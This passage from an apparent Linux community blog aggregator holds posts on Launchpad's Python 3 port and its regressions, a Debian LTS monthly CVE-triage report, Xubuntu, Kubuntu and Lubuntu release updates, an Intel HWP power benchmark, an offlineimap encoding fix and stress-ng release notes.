Launchpad is a complex piece of software that interacts with multiple domains: for example, it deals with a database, HTTP, web page rendering, Debian-format archive publishing, and multiple revision control systems, and there’s often overlap between domains. Each of these tends to imply different kinds of string handling. Web page rendering is normally done mainly in Unicode, converting to bytes as late as possible; revision control systems normally want to spend most of their time working with bytes, although the exact details vary; HTTP is of course bytes on the wire, but Python’s WSGI interface has some string type subtleties. In practice I found myself thinking about at least four string-like “types” (that is, things that in a language with a stricter type system I might well want to define as distinct types and restrict conversion between them): bytes, text, “ordinary” native strings (str in either language, encoded to UTF-8 in Python 2), and native strings with WSGI’s encoding rules. Some of these are emergent properties of writing in the intersection of Python 2 and 3, which is effectively a specialized language of its own without coherent official documentation whose users must intuit its behaviour by comparing multiple sources of information, or by referring to unofficial porting guides: not a very satisfactory situation. Fortunately much of the complexity collapses once it becomes possible to write solely in Python 3.

Some of the difficulties we ran into are not ones that are typically thought of as Python 2-to-3 porting issues, because they were changed later in Python 3’s development process. For instance, the email module was substantially improved in around the 3.2/3.3 timeframe to handle Python 3’s bytes/text model more correctly, and since Launchpad sends quite a few different kinds of email messages and has some quite picky tests for exactly what it emits, this entailed a lot of work in our email sending code and in our test suite to account for that. (It took me a while to work out whether we should be treating raw email messages as bytes or as text; bytes turned out to work best.) 3.4 made some tweaks to the implementation of quoted-printable encoding that broke a number of our tests in ways that took some effort to fix, because the tests needed to work on both 2.7 and 3.5. The list goes on. I got quite proficient at digging through Python’s git history to figure out when and why some particular bit of behaviour had changed.

One of the thorniest problems was parsing HTTP form data. We mainly rely on zope.publisher for this, which in turn relied on cgi.FieldStorage; but cgi.FieldStorage is badly broken in some situations on Python 3. Even if that bug were fixed in a more recent version of Python, we can’t easily use anything newer than 3.5 for the first stage of our port due to the version of the base OS we’re currently running, so it wouldn’t help much. In the end I fixed some minor issues in the multipart module (and was kindly given co-maintenance of it) and converted zope.publisher to use it. Although this took a while to sort out, it seems to have gone very well.

A couple of other interesting late-arriving issues were around pickle. For most things we normally prefer safer formats such as JSON, but there are a few cases where we use pickle, particularly for our session databases. One of my colleagues pointed out that I needed to remember to tell pickle to stick to protocol 2, so that we’d be able to switch back and forward between Python 2 and 3 for a while; quite right, and we later ran into a similar problem with marshal too. A more surprising problem was that datetime.datetime objects pickled on Python 2 require special care when unpickling on Python 3; rather than the approach that ended up being implemented and documented for Python 3.6, though, I preferred a custom unpickler, both so that things would work on Python 3.5 and so that I wouldn’t have to risk affecting the decoding of other pickled strings in the session database.

General lessons

Writing this over a year after Python 2’s end-of-life date, and certainly nowhere near the leading edge of Python 3 porting work, it’s perhaps more useful to look at this in terms of the lessons it has for other large technical debt projects.

I mentioned in my previous article that I used the approach of an enormous and frequently-rebased git branch as a working area for the port, committing often and sometimes combining and extracting commits for review once they seemed to be ready. A port of this scale would have been entirely intractable without a tool of similar power to git rebase, so I’m very glad that we finished migrating to git in 2019. I relied on this right up to the end of the port, and it also allowed for quick assessments of how much more there was to land. git worktree was also helpful, in that I could easily maintain working trees built for each of Python 2 and 3 for comparison.

As is usual for most multi-developer projects, all changes to Launchpad need to go through code review, although we sometimes make exceptions for very simple and obvious changes that can be self-reviewed. Since I knew from the outset that this was going to generate a lot of changes for review, I therefore structured my work from the outset to try to make it as easy as possible for my colleagues to review it. This generally involved keeping most changes to a somewhat manageable size of 800 lines or less (although this wasn’t always possible), and arranging commits mainly according to the kind of change they made rather than their location. For example, when I needed to fix issues with / in Python 3 being true division rather than floor division, I did so in one commit across the various places where it mattered and took care not to mix it with other unrelated changes. This is good practice for nearly any kind of development, but it was especially important here since it allowed reviewers to consider a clear explanation of what I was doing in the commit message and then skim-read the rest of it much more quickly.

It was vital to keep the codebase in a working state at all times, and deploy to production reasonably often: this way if something went wrong the amount of code we had to debug to figure out what had happened was always tractable. (Although I can’t seem to find it now to link to it, I saw an account a while back of a company that had taken a flag-day approach instead with a large codebase. It seemed to work for them, but I’m certain we couldn’t have made it work for Launchpad.)

I can’t speak too highly of Launchpad’s test suite, much of which originated before my time. Without a great deal of extensive coverage of all sorts of interesting edge cases at both the unit and functional level, and a corresponding culture of maintaining that test suite well when making new changes, it would have been impossible to be anything like as confident of the port as we were.

As part of the porting work, we split out a couple of substantial chunks of the Launchpad codebase that could easily be decoupled from the core: its Mailman integration and its code import worker. Both of these had substantial dependencies with complex requirements for porting to Python 3, and arranging to be able to do these separately on their own schedule was absolutely worth it. Like disentangling balls of wool, any opportunity you can take to make things less tightly-coupled is probably going to make it easier to disentangle the rest. (I can see a tractable way forward to porting the code import worker, so we may well get that done soon. Our Mailman integration will need to be rewritten, though, since it currently depends on the Python-2-only Mailman 2, and Mailman 3 has a different architecture.)

Python lessons

Our database layer was already in pretty good shape for a port, since at least the modern bits of its table modelling interface were already strict about using Unicode for text columns. If you have any kind of pervasive low-level framework like this, then making it be pedantic at you in advance of a Python 3 port will probably incur much less swearing in the long run, as you won’t be trying to deal with quite so many bytes/text issues at the same time as everything else.

Early in our port, we established a standard set of __future__ imports and started incrementally converting files over to them, mainly because we weren’t yet sure what else to do and it seemed likely to be helpful. absolute_import was definitely reasonable (and not often a problem in our code), and print_function was annoying but necessary. In hindsight I’m not sure about unicode_literals, though. For files that only deal with bytes and text it was reasonable enough, but as I mentioned above there were also a number of cases where we needed literals of the language’s native str type, i.e. bytes in Python 2 and text in Python 3: this was particularly noticeable in WSGI contexts, but also cropped up in some other surprising places. We generally either omitted unicode_literals or used six.ensure_str in such cases, but it was definitely a bit awkward and maybe I should have listened more to people telling me it might be a bad idea.

A lot of Launchpad’s early tests used doctest, mainly in the style where you have text files that interleave narrative commentary with examples. The development team later reached consensus that this was best avoided in most cases, but by then there were far too many doctests to conveniently rewrite in some other form. Porting doctests to Python 3 is really annoying. You run into all the little changes in how objects are represented as text (particularly u'...' versus '...', but plenty of other cases as well); you have next to no tools to do anything useful like skipping individual bits of a doctest that don’t apply; using __future__ imports requires the rather obscure approach of adding the relevant names to the doctest’s globals in the relevant DocFileSuite or DocTestSuite; dealing with many exception tracebacks requires something like zope.testing.renormalizing; and whatever code refactoring tools you’re using probably don’t work properly. Basically, don’t have done that. It did all turn out to be tractable for us in the end, and I managed to avoid using much in the way of fragile doctest extensions aside from the aforementioned zope.testing.renormalizing, but it was not an enjoyable experience.


I know of nine regressions that reached Launchpad’s production systems as a result of this porting work; of course there were various other regressions caught by CI or in manual testing. (Considering the size of this project, I count it as a resounding success that there were only nine production issues, and that for the most part we were able to fix them quickly.)

Equality testing of removed database objects

One of the things we had to do while porting to Python 3 was to implement the __eq__, __ne__, and __hash__ special methods for all our database objects. This was quite conceptually fiddly, because doing this requires knowing each object’s primary key, and that may not yet be available if we’ve created an object in Python but not yet flushed the actual INSERT statement to the database (most of our primary keys are auto-incrementing sequences). We thus had to take care to flush pending SQL statements in such cases in order to ensure that we know the primary keys.

However, it’s possible to have a problem at the other end of the object lifecycle: that is, a Python object might still be reachable in memory even though the underlying row has been DELETEd from the database. In most cases we don’t keep removed objects around for obvious reasons, but it can happen in caching code, and buildd-manager crashed as a result (in fact while it was still running on Python 2). We had to take extra care to avoid this problem.

Debian imports crashed on non-UTF-8 filenames

Python 2 has some unfortunate behaviour around passing bytes or Unicode strings (depending on the platform) to shutil.rmtree, and the combination of some porting work and a particular source package in Debian that contained a non-UTF-8 file name caused us to run into this. The fix was to ensure that the argument passed to shutil.rmtree is a str regardless of Python version.

We’d actually run into something similar before: it’s a subtle porting gotcha, since it’s quite easy to end up passing Unicode strings to shutil.rmtree if you’re in the process of porting your code to Python 3, and you might easily not notice if the file names in your tests are all encoded using UTF-8.

lazr.restful ETags

We eventually got far enough along that we could switch one of our four appserver machines (we have quite a number of other machines too, but the appservers handle web and API requests) to Python 3 and see what happened. By this point our extensive test suite had shaken out the vast majority of the things that could go wrong, but there was always going to be room for some interesting edge cases.

One of the Ubuntu kernel team reported that they were seeing an increase in 412 Precondition Failed errors in some of their scripts that use our webservice API. These can happen when you’re trying to modify an existing resource: the underlying protocol involves sending an If-Match header with the ETag that the client thinks the resource has, and if this doesn’t match the ETag that the server calculates for the resource then the client has to refresh its copy of the resource and try again. We initially thought that this might be legitimate since it can happen in normal operation if you collide with another client making changes to the same resource, but it soon became clear that something stranger was going on: we were getting inconsistent ETags for the same object even when it was unchanged. Since we’d recently switched a quarter of our appservers to Python 3, that was a natural suspect.

Our lazr.restful package provides the framework for our webservice API, and roughly speaking it generates ETags by serializing objects into some kind of canonical form and hashing the result. Unfortunately the serialization was dependent on the Python version in a few ways, and in particular it serialized lists of strings such as lists of bug tags differently: Python 2 used [u'foo', u'bar', u'baz'] where Python 3 used ['foo', 'bar', 'baz']. In lazr.restful 1.0.3 we switched to using JSON for this, removing the Python version dependency and ensuring consistent behaviour between appservers.

Memory leaks

This problem took the longest to solve. We noticed fairly quickly from our graphs that the appserver machine we’d switched to Python 3 had a serious memory leak. Our appservers had always been a bit leaky, but now it wasn’t so much “a small hole that we can bail occasionally” as “the boat is sinking rapidly”:

A serious memory leak

(Yes, this got in the way of working out what was going on with ETags for a while.)

I spent ages messing around with various attempts to fix this. Since only a quarter of our appservers were affected, and we could get by on 75% capacity for a while, it wasn’t urgent but it was definitely annoying. After spending some quality time with objgraph, for some time I thought traceback reference cycles might be at fault, and I sent a number of fixes to various upstream projects for those (e.g. zope.pagetemplate). Those didn’t help the leaks much though, and after a while it became clear to me that this couldn’t be the sole problem: Python has a cyclic garbage collector that will eventually collect reference cycles as long as there are no strong references to any objects in them, although it might not happen very quickly. Something else must be going on.

Debugging reference leaks in any non-trivial and long-running Python program is extremely arduous, especially with ORMs that naturally tend to end up with lots of cycles and caches. After a while I formed a hypothesis that zope.server might be keeping a strong reference to something, although I never managed to nail it down more firmly than that. This was an attractive theory as we were already in the process of migrating to Gunicorn for other reasons anyway, and Gunicorn also has a convenient max_requests setting that’s good at mitigating memory leaks. Getting this all in place took some time, but once we did we found that everything was much more stable:

A rather flat memory graph

This isn’t completely satisfying as we never quite got to the bottom of the leak itself, and it’s entirely possible that we’ve only papered over it using max_requests: I expect we’ll gradually back off on how frequently we restart workers over time to try to track this down. However, pragmatically, it’s no longer an operational concern.

Mirror prober HTTPS proxy handling

After we switched our script servers to Python 3, we had several reports of mirror probing failures. (Launchpad keeps lists of Ubuntu archive and image mirrors, and probes them every so often to check that they’re reasonably complete and up to date.) This only affected HTTPS mirrors when probed via a proxy server, support for which is a relatively recent feature in Launchpad and involved some code that we never managed to unit-test properly: of course this is exactly the code that went wrong. Sadly I wasn’t able to sort out that gap, but at least the fix was simple.

Non-MIME-encoded email headers

As I mentioned above, there were substantial changes in the email package between Python 2 and 3, and indeed between minor versions of Python 3. Our test coverage here is pretty good, but it’s an area where it’s very easy to have gaps. We noticed that a script that processes incoming email was crashing on messages with headers that were non-ASCII but not MIME-encoded (and indeed then crashing again when it tried to send a notification of the crash!). The only examples of these I looked at were spam, but we still didn’t want to crash on them.

The fix involved being somewhat more careful about both the handling of headers returned by Python’s email parser and the building of outgoing email notifications. This seems to be working well so far, although I wouldn’t be surprised to find the odd other incorrect detail in this sort of area.

Failure to handle non-ISO-8859-1 URL-encoded form input

Remember how I said that parsing HTTP form data was thorny? After we finished upgrading all our appservers to Python 3, people started reporting that they couldn’t post Unicode comments to bugs, which turned out to be only if the attempt was made using JavaScript, and was because I hadn’t quite managed to get URL-encoded form data working properly with zope.publisher and multipart. The current standard describes the URL-encoded format for form data as “in many ways an aberrant monstrosity”, so this was no great surprise.

Part of the problem was some very strange choices in zope.publisher dating back to 2004 or earlier, which I attempted to clean up and simplify. The rest was that Python 2’s urlparse.parse_qs unconditionally decodes percent-encoded sequences as ISO-8859-1 if they’re passed in as part of a Unicode string, so multipart needs to work around this on Python 2.

I’m still not completely confident that this is correct in all situations, but at least now that we’re on Python 3 everywhere the matrix of cases we need to care about is smaller.

Inconsistent marshalling of Loggerhead’s disk cache

We use Loggerhead for providing web browsing of Bazaar branches. When we upgraded one of its two servers to Python 3, we immediately noticed that the one still on Python 2 was failing to read back its revision information cache, which it stores in a database on disk. (We noticed this because it caused a deployment to fail: when we tried to roll out new code to the instance still on Python 2, Nagios checks had already caused an incompatible cache to be written for one branch from the Python 3 instance.)

This turned out to be a similar problem to the pickle issue mentioned above, except this one was with marshal, which I didn’t think to look for because it’s a relatively obscure module mostly used for internal purposes by Python itself; I’m not sure that Loggerhead should really be using it in the first place. The fix was relatively straightforward, complicated mainly by now needing to cope with throwing away unreadable cache data.

Ironically, if we’d just gone ahead and taken the nominally riskier path of upgrading both servers at the same time, we might never have had a problem here.

Intermittent bzr failures

Finally, after we upgraded one of our two Bazaar codehosting servers to Python 3, we had a report of intermittent bzr branch hangs. After some digging I found this in our logs:

Traceback (most recent call last):
  File "/srv/", line 136, in addWindowBytes
  File "/srv/", line 88, in startWriting
  File "/srv/", line 894, in resumeProducing
    for p in self.pipes.itervalues():
builtins.AttributeError: 'dict' object has no attribute 'itervalues'

I’d seen this before in our git hosting service: it was a bug in Twisted’s Python 3 port, fixed after 20.3.0 but unfortunately after the last release that supported Python 2, so we had to backport that patch. Using the same backport dealt with this.


on August 02, 2021 10:34 AM

August 01, 2021

Here’s my (twenty-second) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 31st month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

I spent most of my free time on Clubhouse but still did everything I usually do (but did not go much beyond that, really).

Anyway, I did the following stuff in Debian:

Uploads and bug fixes:

Other $things:

  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 6th month of actively contributing to Ubuntu. Now that I’ve joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

I mostly worked on different things, I guess. But mostly on packaging keylime and some Google Agents upload(s) and SRU(s). Also did a lot of reviewing, et al.

I was too lazy to maintain a list of things I worked on so there’s no concrete list atm. Maybe I’ll get back to this section later or will start to list stuff from next month onward, as I’ve been doing before. :D

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my twenty-second month as a Debian LTS and eleventh month as a Debian ELTS paid contributor.
I was assigned 39.75 hours for LTS and 40.00 hours for ELTS and worked on the following things:

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Front-desk duty from 26-07 until 01-08 for both LTS and ELTS.
  • Triaged nodejs, mongodb, bluez, libmatio, mbedtls, node-url-parse, otrs2, polipo, ruby-bindata, util-linux, exiv2, ruby2.3, varnish, gdal, prosody, glibc, gdal, rpm, icu, ckeditor, libvirt, libjdom1-java, libjdom2-java, tesseract, util-linux, qemu, pillow, tomcat8, libcommons-compress-java, 389-ds-base, and intel-microcode.
  • Mark CVE-2021-22930/nodejs as end-of-life for stretch.
  • Mark CVE-2021-20333/mongodb as end-of-life for stretch.
  • Mark CVE-2021-3652/389-ds-base as no-dsa for stretch.
  • Mark CVE-2021-3658/bluez as no-dsa for stretch.
  • Mark CVE-2020-19497/libmatio as no-dsa for stretch.
  • Mark CVE-2021-24119/mbedtls as no-dsa for stretch.
  • Mark CVE-2021-3664/node-url-parse as end-of-life for stretch.
  • Mark CVE-2021-36091/otrs2 as no-dsa for stretch.
  • Mark CVE-2021-36092/otrs2 as no-dsa for stretch.
  • Mark CVE-2020-36420/polipo as ignored for stretch.
  • Mark CVE-2021-32823/ruby-bindata as no-dsa for stretch.
  • Mark CVE-2021-37600/util-linux as no-dsa for stretch.
  • Mark CVE-2019-25050/gdal as not-affected for stretch.
  • Mark CVE-2021-37601/prosody as not-affected for stretch instead.
  • Mark CVE-2021-35942/glibc as no-dsa for jessie.
  • Mark CVE-2021-36081/tesseract as not-affected for jessie.
  • Mark CVE-2021-35939/rpm as no-dsa for jessie.
  • Mark CVE-2021-35938/rpm as no-dsa for jessie.
  • Mark CVE-2021-35937/rpm as no-dsa for jessie.
  • Mark CVE-2021-30535/icu as not-affected for jessie.
  • Mark CVE-2021-3667/libvirt as not-affected for jessie.
  • Mark CVE-2021-3631/libvirt as no-dsa for jessie.
  • Mark CVE-2021-21391/ckeditor as no-dsa for jessie.
  • Mark CVE-2021-36090/libcommons-compress-java as no-dsa for jessie.
  • Mark CVE-2021-3638/qemu as not-affected for jessie.
  • Mark CVE-2021-34552/pillow as no-dsa for jessie.
  • Mark CVE-2021-37600/util-linux as no-dsa for jessie.
  • Mark CVE-2019-25050/gdal as not-affected for jessie.
  • Mark CVE-2021-3658/bluez as no-dsa for jessie.
  • Auto EOL’ed tiff, dcraw, libspring-security-2.0-java, rabbitmq-server, unrar-nonfree, darktable, mruby, htslib, ndpi, sam2p, libmatio, webkit2gtk, mongodb, otrs2, nodejs, vlc, jruby, asterisk, drupal7, libapache2-mod-auth-openidc, mosquitto, sylpheed, claws-mail, prosody, libapache2-mod-auth-mellon, and linux for jessie.
  • Fix version of libjdom2-java’s ELA.
  • Attended monthly Debian LTS meeting.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.

Until next time.
:wq for today.

on August 01, 2021 05:41 AM

July 29, 2021

Xubuntu 21.10 Dev Update

I&aposm finally getting back to regular FOSS development time, this time focusing again on Xubuntu. Resuming team votes and getting community feedback has kicked off development on Xubuntu 21.10 "Impish Indri". Recent team votes have expanded Xubuntu&aposs collection of apps. Read on to learn more!

Update 7/31: Added Hexchat as another GTK 2 application. Thanks Yousuf!

New Additions

Disk Usage Analyzer (baobab)

Baobab is a utility that scans your storage devices and remote locations and reports on the disk space used by each file or directory. It&aposs useful for tracking down what&aposs eating your disk space so you can keep your storage from filling up.

Xubuntu 21.10 Dev UpdateBaobab makes it easy to visual your disk usage and drill down to find large files.

Disks (gnome-disk-utility)

Disks is an all-in-one utility for managing storage devices. It&aposs feature list is expansive, but some key features include:

  • Create and restore disk images (including flashing ISOs to thumb drives)
  • Partition and format disks, with encryption support
  • Inspect drive speed and health
  • Edit mounting rules (basically a user-friendly fstab editor)
Xubuntu 21.10 Dev UpdateGNOME Disks makes managing your storage a lot easier. Never manually edit fstab again.


Rhythmbox is a music playing and library application. It supports local files and audio streams, and includes a radio browser to find online radio stations. In Xubuntu, we&aposre currently using the default layout (see left screenshot), but members of the community have proposed using the Alternative Toolbar plugin. Which do you prefer? Vote in the Twitter poll!

Clipman (xfce4-clipman-plugin)

Clipman is a clipboard management application and plugin. It keeps a history of text and images copied to the clipboard and allows you to paste it later. Clipboard history can also be searched with the included xfce4-clipman-history command.

Xubuntu 21.10 Dev UpdateClipman remembers your clipboard history and makes it easy to paste later.



Pidgin is a multi-client chat program that has been included in Xubuntu since the beginning, when it was known as Gaim. In recent years, as chat services have moved to proprietary and locked down protocols, Pidgin has become less and less useful, leading to its removal in Xubuntu. If you want to install Pidgin on your system, it can be found on GNOME Software.

Xubuntu 21.10 Dev UpdateIf you&aposre still using Pidgin, you can easily find and install it from GNOME Software.

Active Team Votes


We&aposve got an active team vote to add two new themes to our seed. The themes in question are Arc and Numix Blue.

The Arc theme is a series of flat themes with transparent elements. It includes both light and dark themes with support for numerous desktop environments and applications.

Numix Blue is a blue variation of the Numix theme already included in Xubuntu. It&aposs an unofficial fork that does have some graphical differences beside the switch to a blue accent color.

Clipman by Default

Since we added Clipman to Xubuntu, we now have a second vote for including it in the panel by default. This would automatically enable Clipman&aposs clipboard management, which I&aposm personally opposed to. For my use case, I frequently copy sensitive strings to the clipboard, and I don&apost want them to be saved or displayed anywhere. New users would have no idea the clipboard monitor is even running.

Process Updates

Xubuntu Seed

Because our seed is also updated by Ubuntu maintainers, it is important that the code continues to be hosted on Launchpad. The @Xubuntu/xubuntu-seed code is mirrored from Launchpad every few hours. To help reduce the friction between the two systems, I made some small improvements.

Issues are now synced from Launchpad for the xubuntu-meta source package. I found a solution by the Yaru team for syncing the issues using GitHub actions. Our syncing scripts run daily, syncing both newly created issues and issues that have been closed out.

I&aposve also added a GitHub action to prevent pull requests on our mirror repository. Since the repository is a mirror repository, pull requests are not actionable on GitHub. This action automatically closes those pull requests with a comment pointing the contributor in the right direction.

What&aposs Next?

Votes are ongoing, and there&aposs a lot of activity in the Ubuntu space. GNOME 40 and GTK 4 are starting to land, so there&aposs a strong likelihood that GTK 4 components will make their way into Xubuntu. This means we&aposll now have 3 versions of the toolkit thanks to GIMP and Hexchat (GTK 2), Xfce (GTK 3), GNOME 40 (GTK 4). Hopefully we&aposll see a stable GIMP 3.0 release soon so we can free up some space.

There&aposs some important dates coming soon in the Impish Indri Release Schedule. August 19 marks Feature Freeze, so the outstanding team votes and new feature requests should be settled soon. A couple weeks later, we have the User Interface Freeze on September 9. Let&aposs keep Xubuntu development rolling forward!

Post photo by Adriel Kloppenburg on Unsplash

on July 29, 2021 11:06 AM

July 25, 2021

Kubuntu Groovy Gorilla was released on October 22nd, 2020 with 9 months support.

As of July 22nd, 2021, 20.10 reached ‘end of life’.

No more package updates will be accepted to 20.10, and it will be archived to in the coming weeks.

The official end of life announcement for Ubuntu as a whole can be found here [1].

Kubuntu 20.04 Focal Fossa and 21.04 Hirsute Hippo continue to be supported.

Users of 20.10 can follow the Kubuntu 20.10 to 21.04 Upgrade [2] instructions.

Should for some reason your upgrade be delayed, and you find that the 20.10 repositories have been archived to, instructions to perform a EOL Upgrade can be found on the Ubuntu wiki [3].

Thank you for using Kubuntu 20.10 Groovy Gorilla.

The Kubuntu team.

[1] –
[2] –
[3] –

on July 25, 2021 01:47 PM

July 24, 2021

Intel Hardware P-State (aka Harware Controlled Performance or "Speed Shift") (HWP) is a feature found in more modern x86 Intel CPUs (Skylake onwards). It attempts to select the best CPU frequency and voltage to match the optimal power efficiency for the desired CPU performance.  HWP is more responsive than the older operating system controlled methods and should therefore be more effective.

To test this theory, I exercised my Lenovo T480 i5-8350U 8 thread CPU laptop with the stress-ng cpu stressor using the "double" precision math stress method, exercising 1 to 8 of the CPU threads over a 60 second test run.  The average CPU temperature and average CPU frequency were measured using powerstat and the CPU compute throughput was measured using the stress-ng bogo-ops count.

The HWP mode was set using the x86_energy_perf_policy tool (as found in the Linux source in tools/power/x86/x86_energy_perf_policy).  This allows one to select one of 5 policies:  "normal", "performance", "balance-performance", "balance-power" and "power" as well as enabling or disabling turbo frequencies.  For the tests, turbo mode was also enabled to allow the CPU to run at higher CPU turbo frequencies.

The "performance" policy is the least efficient option as the CPU is clocked at a high frequency even when the system is idle and is not idea for a laptop. The "power" policy will optimize for low power; on my system it set the CPU to a maximum of 400MHz which is not ideal for typical uses.

The more useful "balance-performance" option optimizes for good throughput at the cost of power consumption where as the "balance-power" option optimizes for good power consumption in preference to performance, so I tested these two options.

Comparison #1,  CPU throughput (bogo-ops) vs CPU frequency.

The two HWP policies are almost identical in CPU bogo-ops throughput vs CPU frequency. This is hardly surprising - the compute throughput for math intensive operations should scale with CPU clock frequency. Note that 5 or more CPU threads sees a reduction in compute throughput because the CPU hyper-threads are being used.

Comparison #2, CPU package temperature vs CPU threads used.

Not a big surprise, the more CPU threads being exercised the hotter the CPU package will get. The balance-power policy shows a cooler running CPU than the balance-performance policy.  The balance-performance policy is running hot even when one or a few threads are being used.

Comparison #3, Power consumed vs CPU threads used.

Clearly the balance-performance option is consuming more power than balance-power, this matches the CPU temperature measurements too. More power, higher temperature.

Comparison #4, Maximum CPU frequency vs CPU threads used.

With the balance-performance option, the average maximum CPU frequency drops as more CPU threads are used.  Intel turbo boost allows one to clock a few CPUs to higher frequencies,  exercising more CPUs leads to more power and hence more heat. To keep the CPU package from hitting thermal overrun, CPU frequency and voltage has to be scaled down when using more CPUs. 

This also is true (but far less pronounced) for the balance-power option. As once can see, balance-performance runs the CPU at a much higher frequency, which is great for compute at the expense of power consumption and heat.

Comparison #5, Compute throughput vs power consumed.

So running with the balance-performance runs the CPU at higher speed and hence one gets more compute throughput per unit of time compared to the balance-power mode.  That's great if your laptop is plugged into the mains and you want to get some compute intensive tasks performed quickly.   However, is this more efficient? 

Comparing the amount of compute performance with the power consumed shows that the balance-power option is more efficient than balance-performance.  Basically with balance-power more compute is possible with the same amount of energy compared to balance-performance, but it will take longer to complete.

CPU frequency scaling over time

The 60 second duration tests were long enough for the CPU to warm up enough reach thermal limits causing HWP to throttle back the voltage and CPU frequencies.  The following graphs illustrate how running with the balance-performance option allows the CPU to run for several seconds at a high turbo frequency before it hits a thermal limit and then the CPU frequency and power is adjusted to avoid thermal overrun:


After 8 seconds the CPU package reached 92 degrees C and then CPU frequency scaling kicks in:

..and power consumption drops too: is interesting to note that we can only run for ~9 seconds before the CPU is scaled back to around the same CPU frequency that the balance-power option allows.


Running with HWP balance-power option is a good default choice for maximizing compute while minimizing power consumption for a modern Intel based laptop.  If one wants to crank up the performance at the expense of battery life, then the balance-performance option is most useful.

The balance-performance option when a laptop is plugged into the mains (e.g. via a base-station) may seem like a good idea to get peak compute performance. Note that this may not be useful in the long term as the CPU frequency may drop back to reduce thermal overrun.  However, for bursty infrequent demanding CPU uses this may be a good choice.  I personally refrain from using this as it makes my CPU rather run hot and it's less efficient so it's not ideal for reducing my carbon footprint.

Laptop manufacturers normally set the default HWP option as "balance-power", but this may be changed in the BIOS settings (look for power balance, HWP or Speed Shift options) or changed with x86_energy_perf_policy tool (found in the linux-tools-generic package in Ubuntu).

on July 24, 2021 10:59 PM

July 16, 2021

One of the things I really love about working at Influx Data is the strong social focus for employees. We’re all remote workers, and the teams have strategies to enable us to connect better. One of those ways is via Chess Tournaments! I haven’t played chess for 20 years or more, and was never really any good at it. I know the basic moves, and can sustain a game, but I’m not a chess strategy guru, and don’t know all the best plays.
on July 16, 2021 11:00 AM

July 10, 2021

Lubuntu 20.10 (Groovy Gorilla) was released October 22, 2020 and will reach End of Life on Thursday, July 22, 2021. This means that after that date there will be no further security updates or bugfixes released. We highly recommend that you update to 21.04 as soon as possible if you are still running 20.10. After […]
on July 10, 2021 09:12 PM

offlineimap - unicode decode errors

Sebastian Schauenburg

My main system is currently running Ubuntu 21.04. For e-mail I'm relying on neomutt together with offlineimap, which both are amazing tools. Recently offlineimap was updated/moved to offlineimap3. Looking on my system, offlineimap reports itself as OfflineIMAP 7.3.0 and dpkg tells me it is version 0.0~git20210218.76c7a72+dfsg-1.

Unicode Decode Error problem

Today I noticed several errors in my offlineimap sync log. Basically the errors looked like this:

UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 1299: invalid start byte
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xeb in position 1405: invalid continuation byte


If you encounter it as well (and you use mutt or neomutt), please have a look at this great comment on Github from Joseph Ishac (jishac) since his tip solved the issue for me.

To "fix" this issue for future emails, I modified my .neomuttrc and commented out the default send encoding charset and omitted the iso-8859-1 part:

#set send_charset = "us-ascii:iso-8859-1:utf-8"
set send_charset = "us-ascii:utf-8"

Then I looked through the email files on the filesystem and identified the ISO-8859 encoded emails in the Sent folder which are causing the current issues:

$ file * | grep "ISO-8859"
1520672060_0.1326046.desktop,U=65,FMD5=7f8c0215f16ad5caed8e632086b81b9c:2,S: ISO-8859 text, with very long lines
1521626089_0.43762.desktop,U=74,FMD5=7f8c02831a692adaed8e632086b81b9c:2,S:   ISO-8859 text
1525607314.R13283589178011616624.desktop:2,S:                                ISO-8859 text

That left me with opening the files with vim and saving them with the correct encoding:

:set fileencoding=utf8

Voila, mission accomplished:

$ file * | grep "UTF-8"
1520672060_0.1326046.desktop,U=65,FMD5=7f8c0215f16ad5caed8e632086b81b9c:2,S: UTF-8 Unicode text, with very long lines
1521626089_0.43762.desktop,U=74,FMD5=7f8c02831a692adaed8e632086b81b9c:2,S:   UTF-8 Unicode text
1525607314.R13283589178011616624.desktop:2,S:                                UTF-8 Unicode text
on July 10, 2021 02:00 PM

July 09, 2021

The release of stress-ng 0.12.12 incorporates some useful features and a handful of new stressors.

Media devices such as HDDs and SSDs normally support Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.) to detect and report various measurements of drive reliability.  To complement the various file system and I/O stressors, stress-ng now has a --smart option that checks for any changes in the S.M.A.R.T. measurements and will report these at the end of a stress run, for example: one can see, there are errors on /dev/sdc and this explains why the ZFS pool was having performance issues.

For x86 CPUs I have added a new stressor to trigger System Management Interrupts via writes to port 0xb2 to force the CPU into System Management Mode in ring -2. The --smi stressor option will also measure the time taken to service the SMI. To run this stressor, one needs the --pathological option since this may hang the computer and they behave like non-maskable interrupts:

To exercise the munmap(2) system call a new munmap stressor has been added. This creates child processes that walk through their memory mappings from /proc/$pid/maps and unmap pages on libraries that are not being used. The unapping is performed by striding across the mapping in page multiples of prime size to create many mapping holes to exercise the VM mapping structures. These unmappings can create SIGSEGV segmentation faults that silently get handled and respawn a new child stressor. Example:


There some new options for the fork, vfork and vforkmany stressors, a new vm mode has been added to try and exercise virtual memory mappings. This enables detrimental performance virtual memory advice using  madvise  on  all  pages of the new child process. Where possible this will try to set every page in the new process with using madvise MADV_MERGEABLE, MADV_WILLNEED, MADV_HUGEPAGE  and  MADV_RANDOM flags.  The following shows how to enable the vm options for the fork and vfork stressors:

One final new feature is the --skip-silent option.  This will disable printing of messages when a stressor is skipped, for example, if the stressor is not supported by the kernel, the hardware or a support library is not available.

As usual for each release, stress-ng incorporates bug fixes and has been tested on a wide variety of Linux/*BSD/UNIX/POSIX systems and across a range of processor architectures (arm32, arm64, amd64, i386, ppc64el, RISC-V s390x, sparc64, m68k.  It has also been statically analysed with Coverity and cppcheck and built cleanly with pedantic build flags on gcc and clang.



on July 09, 2021 10:15 AM

July 08, 2021

